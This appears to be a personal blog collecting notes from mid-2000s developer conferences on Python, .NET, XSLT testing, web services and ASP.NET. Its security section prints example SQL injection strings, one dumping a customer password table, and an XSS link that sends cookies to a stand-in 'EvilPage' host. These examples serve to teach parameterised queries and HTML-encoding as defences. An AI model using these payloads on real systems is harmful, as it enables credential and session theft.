ACCU Conference 2005

Introduction

I attended six presentations at the ACCU Conference this year:

  1. IronPython – Python for .NET (Microsoft)
  2. Python at Google (Greg Stein)
  3. C++ and the CLR (Microsoft)
  4. Unit Testing XSLT (Jez Higgins)
  5. Modern 3-Tier Architectures (T-Mobile)
  6. .TEST Testing Framework (Parasoft)

I also made some random observations.

IronPython – Python for .NET

The experience of seeing Python implemented on the CLR (by Jim Hugunin) has influenced Microsoft’s design of .NET 2.0: better support for dynamic languages, generative programming, dynamic classes, and so on are all coming in .NET 2.0. So much so, in fact, that Microsoft head-hunted Hugunin last year.

IronPython targets the CLI, the open standard on which the CLR is based, so it runs on Mono and other, non-Microsoft platforms. We saw a live demonstration of IronPython importing classes written in C# from an Assembly, and calling methods and events on those classes. Even the IronPython source code itself is a Visual Studio project!
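For illustration, the kind of C# class consumed in the demo might look like this (a minimal sketch; the names are hypothetical, not those used in the session):

    using System;

    // Hypothetical C# class of the sort imported into IronPython in the demo.
    public class Greeter
    {
        public event EventHandler Greeted;

        public string Greet(string name)
        {
            if (Greeted != null)
                Greeted(this, EventArgs.Empty);   // raise the event for any Python subscribers
            return "Hello, " + name;
        }
    }

From IronPython, one would reference the compiled Assembly, import Greeter, call Greet, and subscribe to Greeted much as if it were a native Python class.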

Python at Google

Greg Stein has worked for several major organisations, including Microsoft, the Apache Software Foundation and now Google. He revealed that Python is fundamental to Google: it is used not only in back-end management, but as the main language for both Google Groups (http://groups.google.com/) and Google Code (http://code.google.com/). Some of the other areas for which Google uses Python include:

  • Wrappers for Version Control systems – to enforce check-in rules etc.
  • Build system – entirely in Python
  • Packaging of applications prior to deployment
  • Deployment to web-farms and clusters
  • Monitoring of servers (CPU Load, fan speed, NIC utilization, etc.)
  • Auto-restarting of applications
  • Log reporting and analysis

He referred to Python as the “special sauce” which makes one company more ‘tasty’, or appealing, than another. Because Python lends itself to readability and maintainability, it allows code to be changed rapidly as requirements shift. C and C++ tend to be used (in Google) only for specialist, speed-critical tasks. Otherwise, Python (or sometimes Java) is used – it’s simpler and quicker to write, and easier to modify.

Software Development

Greg made some interesting comments about software development. At Google, the typical project is “3 people, 3 months”, forcing many small applications to co-operate rather than growing a single monolithic blob, which aids scalability. Every Google developer has 20% of their time to “play” with their own ideas. Google Maps and the Google Toolbar both started off with employees tinkering with code in that 20% “spare” time.

Employees are also encouraged to submit patches to any part of the Code Base, not just that for their project. This more open approach contrasts with the style at Microsoft (apparently), where teams have access only to the source for their project and no other. Greg argues that this openness explains why Google innovates so well.

As an aside, he said that he has a machine running Unit Tests continuously on the latest code, so that as soon as code breaks, they are notified ;o)

C++ and the CLR

The bod from Redmond pitched C++ as the Systems programming language for the foreseeable future, underpinning the .NET Framework and allowing developers to build applications with the highest possible performance.

The C++ compiler can compile managed code directly to a native platform executable, and allows free mixing of Managed and Unmanaged code throughout an application. In this way, the .NET Framework is treated as just another class library, which can be loaded on demand.

Performance can thus be highly tuned. We were shown a demo of Doom 2 running on the CLR, and running faster than the native code, due to the highly optimized code produced by the C++ compiler. For example, in Managed C++, when a variable goes out of scope, it is automatically set to null by the compiler, making the job of the Garbage Collector much easier. In C#, by contrast, this does not happen automatically, so that objects marked for GC may sit in the GC queue much longer, using up resources.

The Sampling Profiler was recommended as a good tool to use when beginning investigations into performance problems. No code changes are required, and it can be used on live systems with practically no detrimental effect on application speed.

Unit Testing XSLT

XSLT is a fully-specified programming language; it is Turing Complete. However, unlike most programming languages, it has very few testing and debugging tools. Often, in a mixed system of Java/C# + XML + HTML, the XSLT is something of an unknown: output must be inspected visually, not programmatically, to attempt to verify correctness.

Jez Higgins demonstrated some simple code (written in XSLT) which allows Unit-Testing of XSLT.

Basically, like any Unit Testing, you define expected output data for given input data, and test that the software (here, the XSLT transform) produces the correct output. There is an Open Source project called XSLTUnit (http://xsltunit.org/), which, although really proof-of-concept, is stable and useful. Starting with this framework, Jez added extra functionality so that Unit Testing of XSLT files can be included as part of a JUnit test script [the same could be done in other languages, e.g. C# and NUnit].
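As that bracketed note suggests, the core idea translates directly to C# and NUnit. A minimal sketch, assuming hypothetical file names and using plain-text comparison (a real harness would compare the XML structurally):

    using System.IO;
    using System.Xml.Xsl;
    using NUnit.Framework;

    [TestFixture]
    public class XsltTransformTests
    {
        // Run the stylesheet over an input file and capture the output.
        static string Transform(string stylesheet, string inputFile)
        {
            XslCompiledTransform xslt = new XslCompiledTransform();
            xslt.Load(stylesheet);
            using (StringWriter output = new StringWriter())
            {
                xslt.Transform(inputFile, null, output);
                return output.ToString();
            }
        }

        [Test]
        public void ProducesExpectedOutput()
        {
            string expected = File.ReadAllText("expected-output.xml");
            Assert.AreEqual(expected, Transform("transform.xsl", "input.xml"));
        }
    }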

The XML looked initially complicated, but the scheme is actually remarkably simple:

    1. Define input data for a given XSLT file (in XML).
    2. Define expected outputs for the transform (in XML).*
    3. Write a special XSLT file which, upon transform, will produce Java code for each test case. The Java will inspect the XML output file.
    4. Write a small amount of Java to load in the XSLT and XML files, and perform the transformations.
    5. Using Ant and JUnit, compile and run the Java code generated by the XSLT to test the output data.

*Note: the output from the transform must be XML

The beauty of this approach is that existing standard Unit Test tools (JUnit/NUnit/etc.) can be used to test XSLT! XSLT is used to generate code required to test XSLT itself; Java (or C#, etc.) is used dynamically as “scaffolding” to make use of standard testing frameworks.

Example (reconstructed layout; the class name, test-method name, and the three file names are placeholders filled in by the XSLT code generator):

import junit.framework.*;

public class GeneratedXsltTest extends TestCase {
    public GeneratedXsltTest(String name) { super(name); }

    public static Test suite() { return new TestSuite(GeneratedXsltTest.class); }

    public void testTransform() {
        Helper.runTest("stylesheet.xsl", "input.xml", "test-definitions.xml");
    }
} // class

Once the initial test definitions are written, no more work is needed – no Java, no editing XML configuration files. Crucially, the fact that test definitions are written in XSLT allows the XSLT authors themselves (who need not be Java programmers) to write the test definitions; this follows the standard pattern of Unit Testing, where the implementer also writes the Unit Tests.

For systems complicated by complex, previously unverifiable XSLT, this scheme could bring massive improvements.

Modern 3-Tier Architectures

The most salient point made by Nico Josuttis was with regard to Project Management: in a large n-tier system, the architecture will change over its lifetime, and trying to lock down the technical design is a recipe for disaster. Clients like to think that the architecture remains the same, but – even if that is what they are led to believe – developers must be willing to refactor or completely redesign.

The speaker argued that the back-end (database layer) should maintain data consistency itself, and therefore perform checks for:

  • Authentication (who am I?)
  • Authorization (what am I allowed to do?)
  • Validation (does the data make sense?)

There was lots of discussion of the granularity of security and validation, and where exactly this should take place. Most people agreed that having two separate levels of validation is essential. This granularity issue was exemplified by comments from some people who work for large telecoms companies, whose databases contain thousands and (soon) millions of logins – one for each customer – not just a few logins used by the application for all connections, irrespective of the customer. This clearly has performance implications.

Project Management

Nico then spoke about development procedures within a large company, T-Mobile, where (typically) software is released every 3 months; they have 6 weeks of development time, followed by 6 weeks of regression testing – a 50-50 split between coding and testing!

As for releasing software, he reported that in his experience nightly builds are essential (echoing Greg Stein’s comments about the continuously running build machine). He suggested planning for ten per cent of development effort to go into releasing software (build, deploy, integration, etc.).

He was also scathing about UML, MDA, and other “fad” techniques, at least as far as whole projects go. For small tasks they are okay, but a project driven from these modelling approaches is doomed, according to Josuttis.

Parasoft .TEST Testing Framework

Parasoft .TEST is a testing tool for .NET code. It has Visual Studio integration, but can also be run as a stand-alone app (for the QA people) and from the command-line for build process integration.

It addresses three main areas: Coding Standards, QA testing, and Unit Testing. For the latter, it integrates with NUnit, allowing existing Unit tests to be run as part of the testing cycle.

It works by inspecting the ILASM in existing Assemblies, so it can work with Assemblies created with any .NET language. It can automatically generate NUnit test harness projects for the assembly and (with the VS-Plugin version) automatically add these to the Solution. This is probably the biggest bonus – all the tedious Unit Test scaffolding is done for you – all the developer needs to do is fill in the implementation of each generated test. This addresses one of the chief complaints of people using Unit Testing; namely, that it takes a long time to code up all the Test classes.
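The generated code itself was only shown briefly; the stubs have the familiar NUnit shape, something like this sketch (all names hypothetical, and not .TEST’s actual naming conventions):

    using NUnit.Framework;

    // Hypothetical class under test, for illustration only.
    public class Account
    {
        public int Balance;
        public void Deposit(int amount) { Balance += amount; }
    }

    // A sketch of the kind of NUnit stub such a tool generates.
    [TestFixture]
    public class AccountTests
    {
        [Test]
        public void DepositIncreasesBalance()
        {
            Account account = new Account();
            account.Deposit(100);
            Assert.AreEqual(100, account.Balance); // assertion filled in by the developer
        }
    }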

In addition, the suite generates internal Unit Tests for common boundary conditions (null references, indices out of bounds, etc.) across all or part of the Assembly/Assemblies under test.

.TEST ships with about 250 pre-defined Coding Standards, but others can be defined by non-programmers, so that (for example) Security and Performance QA issues can be addressed at the code level, and as part of the testing cycle.

It was pretty impressive; seemingly all the gain and none of the pain of Unit Testing.

Other random observations

Python

There are Python Meetups in London (Putney); the UK Python mailing list is uk-python@python.org.

Version Control

Greg Stein said he wants to convert Google from Perforce to Subversion for Source Code Control. Now, he might be a bit biased (he helped develop SVN), but if SVN is ready for Google, it’s ready for anyone, I reckon!

Sun Tech Days 2004

I attended the Sun Tech Days in London last week. There was a lot of marketing schmooze, and some pretty dull and dry Java implementation stuff, but it was certainly worth going. Heh, it was bizarre to witness the hand-wringing over Microsoft technologies (particularly .NET) by many of the speakers; they spoke as if apologising for an ill-behaved child! Three sessions were interesting to varying degrees: Emerging Web Services Standards, Web Services CodeCamp, and J2EE Transformation Patterns.

Emerging Web Services Standards

Amidst all the hyperbole surrounding Web Services, it is important to define what a Web Service actually is. In its simplest form, a Web Service is an Interprocess Communication mechanism: even the name is a little misleading, as the ‘Web’ as most people know it need not enter into the arena at all. Even the underlying transport need not be HTTP; Web Services can leverage* a variety of protocols, including SMTP, FTP and even WAP or LDAP.

Web Services can thus offer similar services to existing IPC platforms, such as DCOM and CORBA, but — crucially — with many, many benefits over those technologies. The pairing of Web Services with XML allows the provision of services to clients with widely varying requirements; clients can extract from the XML only those operations in which they are interested, without being burdened with the requirement to implement a raft of irrelevant features. In other words, it is Clients which determine the level of service, not the Servers. DCOM/CORBA etc. require the service Endpoints to be fixed and known beforehand; Web Services + XML allow dynamic discovery of Endpoints and services.

There was a brief discussion of Web Services for Remote Portals (WSRP), and how they can be used to abstract the data and functionality provided by a Web Service from the necessary data presentation: [WSRP] aims to allow for interoperability between different kinds of intermediary applications and visual, user-facing web services. Web Services Distributed Management (WSDM) is a little like a meta-WSDL, and allows monitoring and management of Web Services, in a somewhat Aspect-Oriented manner.

The final section of the seminar was devoted to Security. For Web Services, it is not enough to ensure Transport-level security (e.g. HTTPS); rather, within an interconnected group of Web Services, some form of “federated” identification-based security is necessary, probably with “single sign-on” authentication and trust relationships. There is currently no standard available for this type of security, although the OASIS group is working on an implementation using SAML.

Web Services CodeCamp

Web Services on the J2EE platform were introduced as: a set of endpoints or ports operating on messages, running within a container, and described entirely by a WSDL document. This implies that a typical Java Web Service will be implemented as a Component, and executed by an Application Server within a Container, in much the same way that EJBs are handled. Two different Endpoint implementations are available: stateful (using Servlets and JAX/RPC) and stateless (using ‘Session Beans’** and EJBs). JAX/RPC essentially specifies how the XML-to-Java mapping is to be achieved, including the WSDL definition. This mapping includes data types, message handlers, and interface stubs; in fact, the mapping of many Java constructs to WSDL is quite natural:

[Figure: WSDL to Java mappings]

Defining a Web Service interface for JAX/RPC is very similar to defining the remote interface of EJBs:

package hello;

import java.rmi.Remote;
import java.rmi.RemoteException;

public interface HelloIF extends Remote {
    public String sayHello(String s) throws RemoteException;
}

At this point, it became apparent that deploying a Java-based web service is actually non-trivial. Unlike the xcopy style deployment model of ASP.NET, there is a variety of TLAs to contend with when using J2EE. Tools like Sun Studio ONE (or whatever it is now called) can package Java Web Services automatically, as one would expect.

There are three different models for programming under JAX/RPC:

  1. Stub-based – static, with both endpoints (WSDL, stub) defined at compile time
  2. Dynamic proxy – WSDL exists at compile time, but the stub (implementation) is created at runtime
  3. Dynamic invocation interface – both endpoints created at runtime

Naturally, this order corresponds both to increasing programming complexity and to increasing application flexibility.

JAX/RPC represents a tightly-coupled programming model, where — irrespective of endpoint resolution — messages are exchanged ‘immediately’. The Document-Driven (stateless) programming model, however, provides for more loosely-coupled application communication, typically between peers rather than the implicit client-server arrangement of RPC. Data is exchanged using XML documents (on the wire) rather than RPC-style method calls.

J2EE Transformation Patterns

This session was essentially an advertisement for OptimalJ, although it also provided a useful overview of Model Driven Architecture. The case for code generation tools like OptimalJ was made by the speaker thus: given a single requirements document and ten competent programmers, how many distinct implementations can you expect? The answer, of course, is ten distinct implementations – one for each coder. Now throw some less experienced coders into the mix, or someone whose first language is not the same as that used in the requirements document, and the validity of the implementations begins to disintegrate. If the requirements of the project change part-way through — as experience has shown time after time that they will — then how can anyone prove, or even have any idea, that the code is a valid implementation of the (new) requirements?

Many modelling tools attempt to ’round-trip’ between Requirements, Model, and Code. Transformation Patterns, on the other hand, are uni-directional: from Requirements to Model, and then from Model to Code. Code is thus always the output or goal of the process, never one of the inputs to it. This leads to a fill-in-the-blanks coding strategy; however, code is never deleted by the transformation procedure, leaving the programmer in control once the stubs have been generated.

* isn’t this word truly awful?
** another terrible name

Scott Guthrie on ASP.NET

Last Monday I went to hear Scott Guthrie speak on ASP.NET. What follows is a précis of the session. The slides are online (under ASP.NET Presentation in Reading, England).

Introduction

First impressions were good: as a speaker Guthrie was very clear and measured, and flexible yet firm with questions. The talk assumed no prior knowledge of the ASP.NET architecture, so started from a basic discussion of the embedded script tags (<% ... %>) found in most dynamic content frameworks (‘vanilla’ ASP/PHP/JSP etc.). By the end of the session, we had covered: the ASP.NET Server Control model; targeting of mobile devices; form validation; Web Services; Output Caching; Session State; and site security, including SQL Injection and XSS attacks.

Spaghetti

The existing model of dynamic (on-the-fly) HTML content generation as used with ASP/PHP/JSP etc. tends to use a script interpreter to parse server directives/commands embedded in the HTML document. This can lead to a mix of Code and Content which is very difficult to manage and understand. ASP.NET attempts to address this “spaghetti code” problem by providing the means to separate Code and Content. In addition, ASP.NET does not use a scripting engine, but rather compiles all code fragments, resulting in faster execution, especially when combined with Caching. In fact, the code to implement a particular feature need not live in the same file as the markup at all, but in a separate file using a feature called CodeBehind; the code lives “behind” the page, as it were.

Deployment

To address the need for seamless ‘zero-downtime’ updates, ASP.NET uses an ‘xcopy’ deployment model, meaning that deployment is designed to be as simple as copying across new files to the webserver: no configuration tools to run nor locked DLLs to contend with. No doubt there are complications, but the promise is certainly welcome; with Assemblies and Side-By-Side execution, the whole .NET Framework appears to offer a similar promise too.

Server Controls

The ASP.NET coding model seems to have been designed to mimic the familiar Drag-n-Drop (Delphi/VB) style of visual programming, with UI elements exposed as objects with properties, methods and events. This is clearly quite different from the features provided by the underlying HTML, but no more so than the Delphi approach is (thankfully) different from the underlying Win32 API: in each case a flat, procedural style of programming is hidden by an Object-Oriented wrapper. This lets the programmer concentrate on good design and coding without needing to be concerned about ‘plumbing’.
In an ASP.NET file (.aspx) there may be little or no HTML at all, because the ASP.NET runtime produces HTML as output, having compiled and run the code contained in (or referenced by) the page. By sending only HTML back to the browser, ASP.NET can guarantee a much wider range of targets than if, say, some functionality were implemented as ActiveX Controls. Thus, not only is it possible to separate the location of the Content from the Code, but the implementation detail (plumbing) is conceptually separated. This said, there are two different models for code in ASP.NET pages: the CodeBehind model (used by Visual Studio) and Single-file (as used by the free WebMatrix environment). The end effect is broadly the same wherever the code lies, with compiled code running at the server to generate HTML from the Controls specified in the .aspx file.
To learn about ASP.NET programming, WebMatrix was recommended, and it certainly allows you to get ‘up and running’ much more quickly than with VS.NET, largely because it has a built-in Web Server (bound by default to localhost for security reasons), so changes to files can be tested immediately rather than exporting the files to the IIS or Apache tree. The following images show ASP.NET development under WebMatrix.

[Screenshots: setting properties of Form Controls in WebMatrix]

The runat="server" attribute of the different Controls on the form indicates to ASP.NET that event handling and state management code should be generated for those Controls. Any existing HTML control can be attributed in this way; a wider range of ASP.NET Controls uses the asp: namespace (e.g. <asp:CheckBoxList>), and these Controls are always run at the Server. The code is quite simple:

<html>
<head>
</head>
<body>
    <form runat="server">
        &nbsp;&nbsp;
        <p>
            <asp:CheckBoxList id="CheckBoxList1" runat="server">
                <asp:ListItem Value="JubJub Bird">JubJub Bird</asp:ListItem>
                <asp:ListItem Value="Bandersnatch">Bandersnatch</asp:ListItem>
            </asp:CheckBoxList>
        </p>
        <p>
            <asp:Calendar id="Calendar1" runat="server" Font-Names="Verdana,Helvetica">
                <DayStyle backcolor="#FFE0C0"></DayStyle>
                <DayHeaderStyle font-bold="True" forecolor="Maroon"></DayHeaderStyle>
            </asp:Calendar>
        </p>
    </form>
</body>
</html>

The code to hook events from different elements of the page is handled automatically by ASP.NET, as can be seen below. The generated HTML (together with its supporting JavaScript) is comparatively complex:

<body>
    <form name="_ctl0" method="post" action="TestClass.aspx" id="_ctl0">
<input type="hidden" name="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" value="dDwxODgxMjI4MTczOztsPENoZWNrQm94TGlzdDE6MDtDaGVjav5uV2zMZzhwmN4/UeXbAAA04=" />

<script language="javascript">
<!--
 function __doPostBack(eventTarget, eventArgument) {
  var theform;
  if (window.navigator.appName.toLowerCase().indexOf("netscape") > -1) {
   theform = document.forms["_ctl0"];
  }
  else {
   theform = document._ctl0;
  }
  theform.__EVENTTARGET.value = eventTarget.split("$").join(":");
  theform.__EVENTARGUMENT.value = eventArgument;
  theform.submit();
 }
// -->
</script>

        &nbsp;&nbsp;
        <p>
            <table id="CheckBoxList1" border="0">
 <tr>
  <td><input id="CheckBoxList1_0" type="checkbox" name="CheckBoxList1:0" /><label for="CheckBoxList1_0">JubJub Bird</label></td>
 </tr><tr>
  <td><input id="CheckBoxList1_1" type="checkbox" name="CheckBoxList1:1" /><label for="CheckBoxList1_1">Bandersnatch</label></td>
 </tr>
</table>
        </p>
        <p>
            <table id="Calendar1" cellspacing="0" cellpadding="2" border="0" style="border-width:1px;border-style:solid;font-family:Verdana,Helvetica;border-collapse:collapse;">
 <tr><td colspan="7" style="background-color:Silver;"><table cellspacing="0" border="0" style="font-family:Verdana,Helvetica;width:100%;border-collapse:collapse;">
  <tr><td style="width:15%;"><a href="javascript:__doPostBack('Calendar1','V1461')" style="color:Black">&lt;</a></td><td align="Center" style="width:70%;">February 2004</td><td align="Right" style="width:15%;"><a href="javascript:__doPostBack('Calendar1','V1521')" style="color:Black">&gt;</a></td></tr>

Notice the __doPostBack event hooked onto the different cells of the Calendar: the programmer had to write no such event-handling code manually – it was all generated by ASP.NET before pushing the HTML to the browser. There is automatic handling of differences in DOM support between Internet Explorer and Netscape, and a hidden field named ‘__VIEWSTATE’ contains information about the state of the form for when the form is submitted; ASP.NET does not maintain state between page submissions except by the use of these hidden fields.

Styles and Templates

Basic styles of controls can be set at Design-Time using the properties panel in Visual Studio. To apply a collection of styles or property settings across multiple controls, one must either edit the changes on each control manually, or create a User Control (there are some fine distinctions between Server Controls and User Controls). There is, however, an alternative to property setting: ASP Templates. It is possible to specify (either hard-coded or programmatically) a template for presenting data. Using a DataList (not a DataGrid), formatting can be applied to each logical element in the data collection. That element could in effect be a section of HTML pertaining to a single record in a data set, showing, for example, the title, author and description of a book, along with a picture of the cover.

Mobile Devices

Many mobile devices have extremely limited rendering and display capabilities, and most read markup in WML format, a flavour of XML. A WML document is typically divided into one or more subsections or “Cards”. This approach is sufficiently different from the HTML approach (dealing with the whole document at once) that ASP.NET has markup specially for mobile devices. The <mobile:Form> tag is broadly equivalent to the <form> tag for HTML; Controls described with this element are rendered at the server, which pushes WML to the mobile device. One thing not covered by the speaker was the availability of a mechanism to produce ‘cut-down’ markup for low-end/downlevel clients, or clients with special requirements, such as screen readers for the visually impaired. I would guess that some sort of StyleSheet switching based on the UserAgent string may be a way to go, combined with measures to ensure that all elements contain useful descriptive text (e.g. the alt text property of the img tag).


Web Services

Simple Web Services seem easy to implement with .NET: decorating a class method with the [WebMethod] attribute is all that needs to be done. Use of a WebService proxy helps to abstract the code.
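A minimal sketch of such a service in C# (the names are hypothetical):

    using System.Web.Services;

    public class QuoteService : WebService
    {
        // The [WebMethod] attribute is all that is needed; ASP.NET takes
        // care of the WSDL and SOAP plumbing.
        [WebMethod]
        public string GetQuote(string symbol)
        {
            return symbol + ": 42.0";   // placeholder implementation
        }
    }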

Validation

Validation is best performed at BOTH the client AND the server. Validation on the client prevents unnecessary calls to the server: if bad user input can be caught early, bandwidth and time are both saved. However, even if client-side validation succeeds, the server should still validate; because the client-side validation code runs as JavaScript, there is no guarantee that it has been executed before the form is sent to the server (users may have JavaScript turned off, etc.). If the user has JavaScript enabled, she sees the page update as she changes the fields on the form, providing a richer user experience.

Caching

The ASP.NET caching mechanism is powerful and can greatly improve server performance. Whole pages, page fragments and user-specific data can be distinguished and cached separately. The term Output Cache is used because the cache is downstream from the ASP.NET HTML generation engine: it is on the “output” side. Caching can be tied to particular page parameters, so that fine-grained control over page data freshness can be maintained. For example: two separate requests arrive for a page, specifying the same parameters; the first request is served by creating the page, but the second is served from the cache. The varying longevity of data stored in databases can thus be addressed by specifying different timeout periods for different parts of the page: page-hit statistics for the past month can be cached for weeks, whereas (say) “current online users” would have a much shorter cache timeout. The Web Application Stress Tool helps test caching.
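Output caching can be controlled declaratively (with the @ OutputCache page directive) or in code. A sketch of the programmatic form, assuming a hypothetical "category" page parameter:

    using System;
    using System.Web;
    using System.Web.UI;

    public class ProductsPage : Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            // Cache this page's output for 60 seconds, with a separate
            // cache entry per value of the "category" parameter.
            Response.Cache.SetExpires(DateTime.Now.AddSeconds(60));
            Response.Cache.SetCacheability(HttpCacheability.Public);
            Response.Cache.VaryByParams["category"] = true;
        }
    }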

Session State

There are two options for stateful browsing sessions under ASP.NET: Cookies and Cookieless. With Cookies, the Session ID is stored on the client, whereas Cookieless mode tracks the Session ID via a special URL string. In both cases, all other state information is stored on the server, although this data can actually be stored on a machine separate from the webserver (i.e. out-of-process). This is achieved using the aspnet_state service: net start aspnet_state is the command to turn this on. State can also be stored in a SQL Server database. The default is to store state In-Process.
This transparency of state storage enables web-farm scenarios and increased reliability. Pages can be personalised using the Session State information, but only those parts of the page which are specific to a particular session need to be created afresh; the common parts can be retrieved from the Output Cache – see Caching above.
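A sketch of session use in a page (the key name is hypothetical); note that this code is identical whichever storage mode (In-Process, state service, or SQL Server) is configured:

    using System;
    using System.Web.UI;

    public class VisitCounterPage : Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            // Count page views for this session; where the value actually
            // lives is a deployment decision, invisible to this code.
            object stored = Session["visits"];
            int visits = (stored == null) ? 0 : (int)stored;
            Session["visits"] = visits + 1;
        }
    }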

Security

The two types of attacks covered by Guthrie were SQL Injection attacks and Cross-Site Scripting (XSS) attacks.

SQL Injection

SQL Injection vulnerabilities are not specific to any particular programming language or server platform; they rely on naive SQL command construction by the programmer, and on the fact that SQL commands can be concatenated very easily. Any unfiltered user input is essentially dangerous. The demonstration code included a line marked “!!! DANGER !!!” showing how SQL could be injected by an attacker into the database query; a minimal sketch of that anti-pattern (with hypothetical names):
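    using System.Data.SqlClient;

    public class SearchPage
    {
        // !!! DANGER !!! – user input is concatenated straight into the
        // SQL text (a sketch of the anti-pattern; names are hypothetical).
        public SqlCommand BuildQuery(SqlConnection connection, string userInput)
        {
            string sql = "select name, price from products where category = '"
                         + userInput + "'";
            return new SqlCommand(sql, connection);
        }
    }

If the attacker includes special characters such as ' (single quote) and -- (comment), the query can be subverted, as follows: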

  • Attempt to return other columns in the table: a' union select 1, 2, 3;--
  • Check and see if a privileged account is being used: 1' union select dbid, name, filename, 3 from master..sysdatabases;--
  • Dump the password table: 1' union select fullname, emailaddress, password, 3 from commerce..customers;--

In each case, the ' terminates the first part of the query, which is then compounded with another query, which can be as destructive or intrusive as the attacker likes! The solution is to parameterise all SQL input, using the “@parameter” notation; the line Dim param As New SqlParameter("@category", SqlDbType.VarChar) defines a parameter “@category” in which will be placed the text entered by the user. This text can be validated separately by the ASP.NET engine before being executed as SQL. Use of Stored Procedures can also mitigate SQL Injection attacks.
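In C#, the same parameterised approach looks something like this (a sketch, with hypothetical table and column names):

    using System.Data;
    using System.Data.SqlClient;

    public class SafeSearchPage
    {
        // The user's text travels as data in @category; it is never
        // spliced into the SQL string itself.
        public SqlCommand BuildQuery(SqlConnection connection, string userInput)
        {
            SqlCommand cmd = new SqlCommand(
                "select name, price from products where category = @category",
                connection);
            SqlParameter param = new SqlParameter("@category", SqlDbType.VarChar);
            param.Value = userInput;
            cmd.Parameters.Add(param);
            return cmd;
        }
    }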

XSS attacks

XSS attacks hijack unfiltered input echoed to a page by the webserver, often using query strings in URLs. The following code demonstrates this:

<a href="http://.../Search.aspx?Search=<script>document.location.replace('http://localhost/EvilPage.aspx?Cookie=' + document.cookie);</script>">

The naive search page takes whatever is passed in the query string for the “Search” parameter and processes it directly. This means that the <script>-tagged code will execute, and the attacker (in this case) steals the cookie generated by the search page. To avoid these attacks, always validate input, and reject unwanted embedded tags. Also, HTML-encode input strings, so that “<script>” becomes “&lt;script&gt;”. In ASP.NET, use Server.HtmlEncode to achieve this.
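A sketch of the encoding step in C# (inside a page, Server.HtmlEncode provides the same facility):

    using System.Web;

    public class SearchEcho
    {
        // Encode user-supplied text before echoing it back, so that
        // "<script>" becomes "&lt;script&gt;" and can never execute.
        public static string SafeEcho(string userInput)
        {
            return HttpUtility.HtmlEncode(userInput);
        }
    }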

Where code must survive for 30 years

Interesting conversation with a guy on the coach to London on Saturday, who writes distributed middleware for Rutherford. Because he works in an environment where code must survive for 30 years, it must be robust, non-brittle, and simple enough for new team members to modify without the author being present (or even alive…). Some interesting points were:

  • always wrap interfaces – assume that someone else’s interface will be changed at some point in the future (against good practise) by wrapping the interface in a layer of your own. This way, your code is independent of the details of the interface, and you are instead forced to think about implementing the functionality of the interface. Obviously, in large projects with a changing workforce etc., this is particularly important, but – thinking about it – I have already implemented this ‘interface hiding’ in my own code. The LinearFit routine was originally lifted straight from Numerical Recipes and so was pretty nasty. I left the putrid NR interface available as a wrapper (so old code wouldn’t break), but reimplemented the guts with OO using stuff from TChart, and generalised the OO interface to be more useful. It’s actually a pretty good discipline to work to an interface, and when you can add functionality on the side, it rather proves the utility of interfaces (see the C# sketch after this list).
  • Delphi is great – shame it’s dying – having used C and C++ for major dev work, the guy seemed to wholly appreciate the benefits of Delphi. “I don’t give a shit about allocating strings, for fuck’s sake; I just want to use them. C encourages lazy programming…” was a view I’d entirely agree with (all those ‘unchecked buffers’ in webservers? 98% C code, you can bet). It’s difficult to verify the ‘dying’ bit. He said that something like 70% of all UK database infrastructure runs on Delphi, but the skills are limited to x86 platforms. If only Borland would release DCC32.exe for PPC or Sparc. I guess they should have done that a while ago, because x86 seems to be the way forward now, but they are seen as Wintel-only. Kylix is dog-slow for UI stuff, too, apparently.
  • investigate Python – an interesting one, because Phil and others have said the same. Python can run code as interpreted or natively compiled, is modular, and can easily be used as a scripting language. It has dynamic typing (a la RTTI), classes, exceptions, etc., so it is much more friendly than VBScript and friends. Check this out:

    Strings can be concatenated (glued together) with the + operator, and repeated with *:

     >>> word = 'Help' + 'A'
     >>> word
     'HelpA'
     >>> '<' + word*5 + '>'
     '<HelpAHelpAHelpAHelpAHelpA>'
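
Returning to the first bullet, a minimal C# sketch of that ‘interface hiding’ idea (all names hypothetical):

    // A third-party interface we use but do not control.
    public interface IVendorFit
    {
        void Fit(double[] xs, double[] ys, out double slope, out double intercept);
    }

    // Simple result type exposed by our own, stable interface.
    public class LineFit
    {
        public double Slope;
        public double Intercept;
    }

    // The wrapper: the rest of our code depends only on LinearFitter,
    // so a change to IVendorFit touches exactly one class.
    public class LinearFitter
    {
        private readonly IVendorFit vendor;

        public LinearFitter(IVendorFit vendor) { this.vendor = vendor; }

        public LineFit Fit(double[] xs, double[] ys)
        {
            double slope, intercept;
            vendor.Fit(xs, ys, out slope, out intercept);
            LineFit result = new LineFit();
            result.Slope = slope;
            result.Intercept = intercept;
            return result;
        }
    }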

Also mentioned how dire Motif is: apparently, with two TreeView-type widgets on a form, Motif cannot tell which one was clicked. It can tell you which node was hit, but not the owner. Solution? Two separate applications…